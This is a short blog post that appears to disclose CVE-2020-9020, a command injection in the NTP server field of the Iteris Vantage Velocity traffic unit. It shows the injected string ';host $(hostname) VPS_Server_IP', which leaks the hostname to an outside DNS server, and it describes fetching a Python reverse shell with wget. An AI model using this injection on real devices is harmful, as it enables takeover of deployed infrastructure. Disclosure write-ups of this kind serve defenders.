Friday, January 24, 2020

[ITERIS] - Vantage Velocity Field Unit - Os Code Injection - (CVE-2020-9020)


Affected Versions:

  • 2.3.1
  • 2.4.2 
  • 3.0

Surfing the internet I found this device that I did not know, and that turned out to be quite interesting. In the first instance what I see is a menu called "Time Settings", inside it, there is a function called "Synchronize With NTP Server", so I imagine that behind it ran something similar to an "ntpdate -u ntp.server. com "for example. so I decided to try the classic ";" and concatenate a new command, in this case a "host $ (hostname) VPS_Server_IP" and on my DNS server I get to the hostname of the device, which confirms that it was possible to execute commands.

Getting hostname

Getting the name of the user I control

Once I could confirm that it is possible to execute a command, you have to try to get a reverse shell. So I use the "wget" command to download a python revershell to take full control of the system

Revershell execution and the device is compromised

By: @linuxmonr4



0 comentarios:

Post a Comment